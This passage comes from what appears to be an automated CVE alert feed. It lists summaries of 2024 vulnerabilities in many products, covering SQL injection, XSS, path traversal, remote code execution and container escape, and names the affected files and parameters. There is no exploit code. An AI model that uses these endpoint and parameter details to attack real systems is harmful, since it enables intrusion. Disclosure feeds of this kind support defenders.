317-2 PN/DP (6AG1317-2EK14-7AB0), SIPLUS S7-300 CPU 317F-2 PN/DP (6AG1317-2FK14-2AB0). The Interniche-based TCP Stack can be forced to make very expensive calls for every incoming packet which can lead to a denial of service.🎖@cveNotify |
|
| 2024-05-14 15:37:52 |
🚨 CVE-2024-2067A vulnerability was found in SourceCodester Computer Inventory System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /endpoint/delete-computer.php. The manipulation of the argument computer leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-255382 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-14 15:37:51 |
🚨 CVE-2024-2065A vulnerability was found in SourceCodester Barangay Population Monitoring System up to 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /endpoint/update-resident.php. The manipulation of the argument full_name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255380.🎖@cveNotify |
|
| 2024-05-14 15:37:50 |
🚨 CVE-2024-2064A vulnerability has been found in rahman SelectCours 1.0 and classified as problematic. Affected by this vulnerability is the function getCacheNames of the file CacheController.java of the component Template Handler. The manipulation of the argument fragment leads to injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255379.🎖@cveNotify |
|
| 2024-05-14 15:37:49 |
🚨 CVE-2024-2063A vulnerability, which was classified as problematic, was found in SourceCodester Petrol Pump Management Software 1.0. Affected is an unknown function of the file /admin/app/profile_crud.php. The manipulation of the argument username leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-255378 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-14 15:37:44 |
🚨 CVE-2024-2062A vulnerability, which was classified as critical, has been found in SourceCodester Petrol Pump Management Software 1.0. This issue affects some unknown processing of the file /admin/edit_categories.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255377 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-14 15:37:43 |
🚨 CVE-2024-2060A vulnerability classified as critical has been found in SourceCodester Petrol Pump Management Software 1.0. This affects an unknown part of the file /admin/app/login_crud.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-255375.🎖@cveNotify |
|
| 2024-05-14 15:37:42 |
🚨 CVE-2024-2059A vulnerability was found in SourceCodester Petrol Pump Management Software 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /admin/app/service_crud.php. The manipulation of the argument photo leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-255374 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-14 15:37:41 |
🚨 CVE-2024-2057A vulnerability was found in LangChain langchain_community 0.0.26. It has been classified as critical. Affected is the function load_local in the library libs/community/langchain_community/retrievers/tfidf.py of the component TFIDFRetriever. The manipulation leads to server-side request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.0.27 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-255372.🎖@cveNotify |
|
| 2024-05-14 15:37:37 |
🚨 CVE-2024-2022A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/list_ipAddressPolicy.php. The manipulation of the argument GroupId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255301 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 15:37:36 |
🚨 CVE-2024-2021A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. Affected is an unknown function of the file /admin/list_localuser.php. The manipulation of the argument ResId leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255300. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 15:37:35 |
🚨 CVE-2024-2009A vulnerability was found in Nway Pro 9. It has been rated as problematic. Affected by this issue is the function ajax_login_submit_form of the file login\index.php of the component Argument Handler. The manipulation of the argument rsargs[] leads to information exposure through error message. The attack may be launched remotely. VDB-255266 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 15:37:34 |
🚨 CVE-2024-26462Kerberos 5 (aka krb5) 1.21.2 contains a memory leak vulnerability in /krb5/src/kdc/ndr.c.🎖@cveNotify |
|
| 2024-05-14 15:37:29 |
🚨 CVE-2024-26461Kerberos 5 (aka krb5) 1.21.2 contains a memory leak vulnerability in /krb5/src/lib/gssapi/krb5/k5sealv3.c.🎖@cveNotify |
|
| 2024-05-14 15:37:28 |
🚨 CVE-2024-27905** UNSUPPORTED WHEN ASSIGNED ** Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Aurora.An endpoint exposing internals to unauthenticated users can be used as a "padding oracle" allowing an anonymous attacker to construct a valid authentication cookie. Potentially this could be combined with vulnerabilities in other components to achieve remote code execution.As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users.NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2024-05-14 15:37:27 |
🚨 CVE-2024-26484A stored cross-site scripting (XSS) vulnerability in the Edit Content Layout module of Kirby CMS v4.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Link field. NOTE: the vendor's position is that this issue did not affect any version of Kirby CMS. The only effect was on the trykirby.com demo site, which is not customer-controlled.🎖@cveNotify |
|
| 2024-05-14 14:38:06 |
🚨 CVE-2023-4172A vulnerability, which was classified as problematic, has been found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This issue affects some unknown processing of the file \Service\FileHandler.ashx. The manipulation of the argument FileDirectory leads to absolute path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236207.🎖@cveNotify |
|
| 2024-05-14 14:38:05 |
🚨 CVE-2023-4171A vulnerability classified as problematic was found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This vulnerability affects unknown code of the file \Service\FileDownload.ashx. The manipulation of the argument Files leads to path traversal: '../filedir'. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-236206 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-14 14:38:04 |
🚨 CVE-2023-4169A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:38:03 |
🚨 CVE-2023-4168A vulnerability was found in Templatecookie Adlisting 2.14.0. It has been classified as problematic. Affected is an unknown function of the file /ad-list of the component Redirect Handler. The manipulation leads to information disclosure. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-236184. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:58 |
🚨 CVE-2023-4166A vulnerability has been found in Tongda OA and classified as critical. This vulnerability affects unknown code of the file general/system/seal_manage/dianju/delete_log.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. VDB-236182 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:57 |
🚨 CVE-2023-4121A vulnerability was found in Byzoro Smart S85F Management Platform up to 20230722. It has been classified as critical. Affected is an unknown function. The manipulation of the argument file_upload leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-235968. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:56 |
🚨 CVE-2023-4120A vulnerability was found in Byzoro Smart S85F Management Platform up to 20230722 and classified as critical. This issue affects some unknown processing of the file importhtml.php. The manipulation of the argument sql leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-235967. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:52 |
🚨 CVE-2023-4119A vulnerability has been found in Academy LMS 6.0 and classified as problematic. This vulnerability affects unknown code of the file /academy/home/courses. The manipulation of the argument query/sort_by leads to cross site scripting. The attack can be initiated remotely. VDB-235966 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:51 |
🚨 CVE-2023-4117A vulnerability, which was classified as problematic, has been found in PHP Jabbers Rental Property Booking 2.0. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be launched remotely. The identifier of this vulnerability is VDB-235964. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:50 |
🚨 CVE-2023-4116A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:49 |
🚨 CVE-2023-4115A vulnerability classified as problematic has been found in PHP Jabbers Cleaning Business 1.0. Affected is an unknown function of the file /index.php. The manipulation of the argument index leads to cross site scripting. It is possible to launch the attack remotely. VDB-235962 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:48 |
🚨 CVE-2023-4114A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:46 |
🚨 CVE-2023-4113A vulnerability was found in PHP Jabbers Service Booking Script 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-235960. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:45 |
🚨 CVE-2023-4111A vulnerability was found in PHP Jabbers Bus Reservation System 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /index.php. The manipulation of the argument index/pickup_id leads to cross site scripting. The attack may be launched remotely. VDB-235958 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-14 14:37:44 |
🚨 CVE-2023-4110A vulnerability has been found in PHP Jabbers Availability Booking Calendar 5.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument session_id leads to cross site scripting. The attack can be launched remotely. The identifier VDB-235957 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-05-13 23:37:24 |
🚨 CVE-2023-7216A path traversal vulnerability was found in the CPIO utility. This issue could allow a remote unauthenticated attacker to trick a user into opening a specially crafted archive. During the extraction process, the archiver could follow symlinks outside of the intended directory, which allows files to be written in arbitrary directories through symlinks.🎖@cveNotify |
|
| 2024-05-13 17:37:25 |
🚨 CVE-2024-1139A credentials leak vulnerability was found in the cluster monitoring operator in OCP. This issue may allow a remote attacker who has basic login credentials to check the pod manifest to discover a repository pull secret.🎖@cveNotify |
|
| 2024-05-13 08:37:34 |
🚨 CVE-2024-26980In the Linux kernel, the following vulnerability has been resolved:ksmbd: fix slab-out-of-bounds in smb2_allocate_rsp_bufIf ->ProtocolId is SMB2_TRANSFORM_PROTO_NUM, smb2 request sizevalidation could be skipped. if request size is smaller thansizeof(struct smb2_query_info_req), slab-out-of-bounds read can happen insmb2_allocate_rsp_buf(). This patch allocate response buffer afterdecrypting transform request. smb3_decrypt_req() will validate transformrequest size and avoid slab-out-of-bound in smb2_allocate_rsp_buf().🎖@cveNotify |
|
| 2024-05-13 08:37:33 |
🚨 CVE-2024-26925In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: release mutex after nft_gc_seq_end from abort pathThe commit mutex should not be released during the critical sectionbetween nft_gc_seq_begin() and nft_gc_seq_end(), otherwise, async GCworker could collect expired objects and get the released commit lockwithin the same GC sequence.nf_tables_module_autoload() temporarily releases the mutex to loadmodule dependencies, then it goes back to replay the transaction again.Move it at the end of the abort phase after nft_gc_seq_end() is called.🎖@cveNotify |
|
| 2024-05-13 08:37:32 |
🚨 CVE-2024-26651In the Linux kernel, the following vulnerability has been resolved:sr9800: Add check for usbnet_get_endpointsAdd check for usbnet_get_endpoints() and return the error if it failsin order to transfer the error.🎖@cveNotify |
|
| 2024-05-11 13:51:39 |
None |
|
| 2024-05-10 18:37:24 |
🚨 CVE-2023-6549Improper Restriction of Operations within the Bounds of a Memory Buffer in NetScaler ADC and NetScaler Gateway allows Unauthenticated Denial of Service and Out-Of-Bounds Memory Read🎖@cveNotify |
|
| 2024-05-10 16:37:24 |
🚨 CVE-2023-6799The WP Reset – Most Advanced WordPress Reset Tool plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0 via the use of insufficiently random snapshot names. This makes it possible for unauthenticated attackers to extract sensitive data including site backups by brute-forcing the snapshot filenames. Please note that the vendor does not plan to do any further hardening on this functionality.🎖@cveNotify |
|
| 2024-05-10 15:37:24 |
🚨 CVE-2024-1561An issue was discovered in gradio-app/gradio, where the `/component_server` endpoint improperly allows the invocation of any method on a `Component` class with attacker-controlled arguments. Specifically, by exploiting the `move_resource_to_block_cache()` method of the `Block` class, an attacker can copy any file on the filesystem to a temporary directory and subsequently retrieve it. This vulnerability enables unauthorized local file read access, posing a significant risk especially when the application is exposed to the internet via `launch(share=True)`, thereby allowing remote attackers to read files on the host machine. Furthermore, gradio apps hosted on `huggingface.co` are also affected, potentially leading to the exposure of sensitive information such as API keys and credentials stored in environment variables.🎖@cveNotify |
|
| 2024-05-10 14:37:24 |
🚨 CVE-2024-31497In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6.🎖@cveNotify |
|
| 2024-05-09 23:37:26 |
🚨 CVE-2023-51606Kofax Power PDF U3D File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Kofax Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of U3D files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process.. Was ZDI-CAN-21759.🎖@cveNotify |
|
| 2024-05-09 23:37:25 |
🚨 CVE-2023-38097NETGEAR ProSAFE Network Management System BkreProcessThread Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed.The specific flaw exists within the BkreProcessThread class. The issue results from an exposed dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM.. Was ZDI-CAN-19719.🎖@cveNotify |
|
| 2024-05-09 23:37:24 |
🚨 CVE-2023-35743D-Link DAP-2622 DDP Configuration Restore Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.. Was ZDI-CAN-20070.🎖@cveNotify |
|
| 2024-05-09 22:37:25 |
🚨 CVE-2024-3154A flaw was found in cri-o, where an arbitrary systemd property can be injected via a Pod annotation. Any user who can create a pod with an arbitrary annotation may perform an arbitrary action on the host system.🎖@cveNotify |
|
| 2024-05-09 22:37:24 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-05-09 19:07:26 |
🚨 CVE-2022-26504Improper authentication in Veeam Backup & Replication 9.5U3, 9.5U4,10.x and 11.x component used for Microsoft System Center Virtual Machine Manager (SCVMM) allows attackers execute arbitrary code via Veeam.Backup.PSManager.exe🎖@cveNotify |
|
| 2024-05-09 19:07:25 |
🚨 CVE-2022-26500Improper limitation of path names in Veeam Backup & Replication 9.5U3, 9.5U4,10.x, and 11.x allows remote authenticated users access to internal API functions that allows attackers to upload and execute arbitrary code.🎖@cveNotify |
|
| 2024-05-09 19:07:24 |
🚨 CVE-2015-5742VeeamVixProxy in Veeam Backup & Replication (B&R) before 8.0 update 3 stores local administrator credentials in log files with world-readable permissions, which allows local users to obtain sensitive information by reading the files.🎖@cveNotify |
|
| 2024-05-09 16:37:25 |
🚨 CVE-2024-2700A vulnerability was found in the quarkus-core component. Quarkus captures local environment variables from the Quarkus namespace during the application's build, therefore, running the resulting application inherits the values captured at build time. Some local environment variables may have been set by the developer or CI environment for testing purposes, such as dropping the database during application startup or trusting all TLS certificates to accept self-signed certificates. If these properties are configured using environment variables or the .env facility, they are captured into the built application, which can lead to dangerous behavior if the application does not override these values. This behavior only happens for configuration properties from the `quarkus.*` namespace. Application-specific properties are not captured.🎖@cveNotify |
|
| 2024-05-09 16:37:24 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-05-09 15:37:24 |
🚨 CVE-2024-23817Dolibarr is an enterprise resource planning (ERP) and customer relationship management (CRM) software package. Version 18.0.4 has a HTML Injection vulnerability in the Home page of the Dolibarr Application. This vulnerability allows an attacker to inject arbitrary HTML tags and manipulate the rendered content in the application's response. Specifically, I was able to successfully inject a new HTML tag into the returned document and, as a result, was able to comment out some part of the Dolibarr App Home page HTML code. This behavior can be exploited to perform various attacks like Cross-Site Scripting (XSS). To remediate the issue, validate and sanitize all user-supplied input, especially within HTML attributes, to prevent HTML injection attacks; and implement proper output encoding when rendering user-provided data to ensure it is treated as plain text rather than executable HTML.🎖@cveNotify |
|
| 2024-05-09 14:37:24 |
🚨 CVE-2024-34383Authorization Bypass Through User-Controlled Key vulnerability in The SEO Guys at SEOPress SEOPress.This issue affects SEOPress: from n/a through 7.7.1.🎖@cveNotify |
|
| 2024-05-09 13:07:30 |
🚨 CVE-2024-34257TOTOLINK EX1800T V9.1.0cu.2112_B20220316 has a vulnerability in the apcliEncrypType parameter that allows unauthorized execution of arbitrary commands, allowing an attacker to obtain device administrator privileges.🎖@cveNotify |
|
| 2024-05-09 13:07:26 |
🚨 CVE-2024-33382An issue in Open5GS v.2.7.0 allows an attacker to cause a denial of service via the 64 unsuccessful UE/gnb registration🎖@cveNotify |
|
| 2024-05-09 13:07:25 |
🚨 CVE-2024-25532RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the bt_id parameter at /include/get_dict.aspx.🎖@cveNotify |
|
| 2024-05-09 13:07:24 |
🚨 CVE-2024-25528RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /PersonalAffair/worklog_template_show.aspx.🎖@cveNotify |
|
| 2024-05-09 09:37:24 |
🚨 CVE-2024-3507Improper privilege management vulnerability in Lunar software that affects versions 6.0.2 through 6.6.0. This vulnerability allows an attacker to perform a secondary process injection into the Lunar application and abuse those rights to access sensitive user information.🎖@cveNotify |
|
| 2024-05-09 01:37:24 |
🚨 CVE-2023-50364A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute code via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.6.2722 build 20240402 and laterQuTS hero h5.1.6.2734 build 20240414 and later🎖@cveNotify |
|
| 2024-05-08 17:37:31 |
🚨 CVE-2024-34244libmodbus v3.1.10 is vulnerable to Buffer Overflow via the modbus_write_bits function. This issue can be triggered when the function is fed with specially crafted input, which leads to out-of-bounds read and can potentially cause a crash or other unintended behaviors.🎖@cveNotify |
|
| 2024-05-08 17:37:30 |
🚨 CVE-2024-33382An issue in Open5GS v.2.7.0 allows an attacker to cause a denial of service via the 64 unsuccessful UE/gnb registration🎖@cveNotify |
|
| 2024-05-08 17:37:26 |
🚨 CVE-2024-25532RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the bt_id parameter at /include/get_dict.aspx.🎖@cveNotify |
|
| 2024-05-08 17:37:25 |
🚨 CVE-2024-3661DHCP can add routes to a client’s routing table via the classless static route option (121). VPN-based security solutions that rely on routes to redirect traffic can be forced to leak traffic over the physical interface. An attacker on the same local network can read, disrupt, or possibly modify network traffic that was expected to be protected by the VPN.🎖@cveNotify |
|
| 2024-05-08 17:37:24 |
🚨 CVE-2024-1459A path traversal vulnerability was found in Undertow. This issue may allow a remote attacker to append a specially-crafted sequence to an HTTP request for an application deployed to JBoss EAP, which may permit access to privileged or restricted files and directories.🎖@cveNotify |
|
| 2024-05-08 17:07:44 |
🚨 CVE-2024-25522RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the office_missive_id parameter at /WorkFlow/wf_work_form_save.aspx.🎖@cveNotify |
|
| 2024-05-08 17:07:43 |
🚨 CVE-2024-25520RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /SysManage/sys_blogtemplate_new.aspx.🎖@cveNotify |
|
| 2024-05-08 17:07:42 |
🚨 CVE-2024-25519RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the idlist parameter at /WorkFlow/wf_work_print.aspx.🎖@cveNotify |
|
| 2024-05-08 17:07:39 |
🚨 CVE-2024-25518RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the template_id parameter at /WorkFlow/wf_get_fields_approve.aspx.🎖@cveNotify |
|
| 2024-05-08 17:07:38 |
🚨 CVE-2024-25515RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the sys_file_storage_id parameter at /WorkFlow/wf_work_finish_file_down.aspx.🎖@cveNotify |
|
| 2024-05-08 17:07:37 |
🚨 CVE-2024-4652A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/show_teacher2.php. The manipulation of the argument month leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263496.🎖@cveNotify |
|
| 2024-05-08 17:07:33 |
🚨 CVE-2024-4651A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. This issue affects some unknown processing of the file /view/student_attendance_history1.php. The manipulation of the argument year leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263495.🎖@cveNotify |
|
| 2024-05-08 17:07:32 |
🚨 CVE-2024-4650A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. This vulnerability affects unknown code of the file /view/student_due_payment.php. The manipulation of the argument due_month leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263494 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-08 16:37:32 |
🚨 CVE-2024-28971Dell Update Manager Plugin, versions 1.4.0 through 1.5.0, contains a Plain-text Password Storage Vulnerability in Log file. A remote high privileged attacker could potentially exploit this vulnerability, leading to the disclosure of certain user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application with privileges of the compromised account.🎖@cveNotify |
|
| 2024-05-08 16:37:31 |
🚨 CVE-2024-25530RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the PageID parameter at /WebUtility/get_find_condiction.aspx.🎖@cveNotify |
|
| 2024-05-08 16:37:30 |
🚨 CVE-2024-25529RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /WorkFlow/wf_office_file_history_show.aspx.🎖@cveNotify |
|
| 2024-05-08 16:37:26 |
🚨 CVE-2024-24908Dell PowerProtect DM5500 version 5.15.0.0 and prior contain an Arbitrary File Delete via Path Traversal vulnerability. A remote attacker with high privileges could potentially exploit this vulnerability to deletion of arbitrary files stored on the server filesystem.🎖@cveNotify |
|
| 2024-05-08 16:37:25 |
🚨 CVE-2024-24787On Darwin, building a Go module which contains CGO can trigger arbitrary code execution when using the Apple version of ld, due to usage of the -lto_library flag in a "#cgo LDFLAGS" directive.🎖@cveNotify |
|
| 2024-05-08 16:37:24 |
🚨 CVE-2024-22460Dell PowerProtect DM5500 version 5.15.0.0 and prior contains an insecure deserialization Vulnerability. A remote attacker with high privileges could potentially exploit this vulnerability, leading to arbitrary code execution on the vulnerable application.🎖@cveNotify |
|
| 2024-05-08 15:37:45 |
🚨 CVE-2024-28889When an SSL profile with alert timeout is configured with a non-default value on a virtual server, undisclosed traffic along with conditions beyond the attacker's control can cause the Traffic Management Microkernel (TMM) to terminate. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2024-05-08 15:37:44 |
🚨 CVE-2024-28132Exposure of Sensitive Information vulnerability exists in the GSLB container, which may allow an authenticated attacker with local access to view sensitive information. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2024-05-08 15:37:43 |
🚨 CVE-2024-26579Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.7.0 through 1.11.0, the attackers can bypass using malicious parameters.Users are advised to upgrade to Apache InLong's 1.12.0 or cherry-pick [1], [2] to solve it.[1] https://github.com/apache/inlong/pull/9694 [2] https://github.com/apache/inlong/pull/9707🎖@cveNotify |
|
| 2024-05-08 15:37:39 |
🚨 CVE-2024-26026An SQL injection vulnerability exists in the BIG-IP Next Central Manager API (URI). Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated🎖@cveNotify |
|
| 2024-05-08 15:37:38 |
🚨 CVE-2024-25526RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the project_id parameter at /ProjectManage/pm_gatt_inc.aspx.🎖@cveNotify |
|
| 2024-05-08 15:37:37 |
🚨 CVE-2024-25524RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the sys_file_storage_id parameter at /WorkPlan/WorkPlanAttachDownLoad.aspx.🎖@cveNotify |
|
| 2024-05-08 15:37:33 |
🚨 CVE-2024-25523RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the file_id parameter at /filemanage/file_memo.aspx.🎖@cveNotify |
|
| 2024-05-08 15:37:32 |
🚨 CVE-2024-25521RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the txt_keyword parameter at get_company.aspx.🎖@cveNotify |
|
| 2024-05-08 15:37:31 |
🚨 CVE-2024-25520RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the id parameter at /SysManage/sys_blogtemplate_new.aspx.🎖@cveNotify |
|
| 2024-05-08 15:37:30 |
🚨 CVE-2024-25519RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the idlist parameter at /WorkFlow/wf_work_print.aspx.🎖@cveNotify |
|
| 2024-05-08 15:37:27 |
🚨 CVE-2024-25518RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the template_id parameter at /WorkFlow/wf_get_fields_approve.aspx.🎖@cveNotify |
|
| 2024-05-08 15:37:26 |
🚨 CVE-2024-25515RuvarOA v6.01 and v12.01 were discovered to contain a SQL injection vulnerability via the sys_file_storage_id parameter at /WorkFlow/wf_work_finish_file_down.aspx.🎖@cveNotify |
|
| 2024-05-08 15:37:25 |
